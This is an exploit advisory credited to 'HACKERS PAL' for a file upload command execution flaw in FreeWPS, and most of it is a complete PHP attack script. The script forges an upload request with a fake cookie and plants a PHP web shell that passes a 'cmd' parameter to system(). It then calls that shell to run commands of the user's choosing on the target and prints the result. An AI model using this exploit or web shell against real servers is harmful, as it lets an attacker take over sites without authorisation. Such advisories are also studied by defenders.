FreeWPS File Upload Command Execution

Advisory Content :

Hello,,

Free WPS File upload Command execution Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net [email concealed]

exploit :

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* Free WPS Command execution
/* This exploit should allow you to execute commands
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/* FreeWPS Command Execution */
/* by HACKERS PAL <security (at) soqor (dot) net [email concealed]>
*/
/* site: http://www.soqor.net */');
if ($argc<4) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host path cmd
/* Example: */
/* php '.$argv[0].' localhost /freewps/ id
/**********************************************/
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
Function get_page($url)
{

if(function_exists("file_get_contents"))
{

$contents = file_get_contents($url);

}
else
{
$fp=fopen("$url","r");
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}

}
return $contents;
}

function connect($packet)
{
global $host, $port, $html;
$con=fsockopen(gethostbyname($host),$port);
if (!$con)
{
echo '[-] Error - No response from '.$host.':'.$port; die;
}
fputs($con,$packet);
$html='';
while ((!feof($con)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($con,1);
}
GLOBAL $html;
fclose($con);
}

$i=0;
$data="";

function add_data($name,$value,$type="no",$filename)
{
GLOBAL $data,$i;
if($type=="file")
{
$data.="-----------------------------7d62702f250530
Content-Disposition: form-data; name="$filename"; filename="$name";
Content-Type: text/plain

$value
";
}
elseif($type=="init")
{

$data.="-----------------------------7d62702f250530--";

}
elseif($type=="clean")
{
$data="";
}
else
{
$data.="-----------------------------7d62702f250530
Content-Disposition: form-data; name="$name";
Content-Type: text/plain

$value
";
}

}

$host=$argv[1];
$path=$argv[2];
$cmd=$argv[3];
$port=80;

$cmd=urlencode($cmd);

$p='http://'.$host.':'.$port.$path;

Echo "n[+] Trying to Upload File";

$cookie="Master=HACKERS20%PAL";
$contents='<?php
$cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd];
system($cmd);
?>';

add_data("empty.php","","file","File1");
add_data("soqor.php",$contents,"file","File2");
add_data("soqor.php",$contents,"file","File3");
add_data('','',"init");

$packet="POST ".$p."upload.php?&-269001946=1&-834358190=1 HTTP/1.0rn";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*rn";
$packet.="Referer: http://".$host.$path."profile.php?mode=editprofilern";
$packet.="Accept-Language: itrn";
$packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d62702f250530rn";
$packet.="Accept-Encoding: gzip, deflatern";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1)rn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cache-Control: no-cachern";
$packet.="Cookie: ".$cookie."rnrn";
$packet.=$data;
connect($packet);

if (eregi("Successfully uploaded <soqor.php>",$html))
{
echo "n[+] Successfully uploaded ...n[+] Go To
http://".$host.$path."upload/soqor.php?cmd=$cmd for your own commands..
n[+] The Result Of The Commandn";
Echo get_page($p."upload/soqor.php?cmd=".$cmd);
}
else
{
echo "n[-] Unable to Upload Filen[-] Exploit Failed";
}
echo ("n/* Visit us : WwW.SoQoR.NeT
*/n/**********************************************/");
?>

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

FreeWPS File Upload Command Execution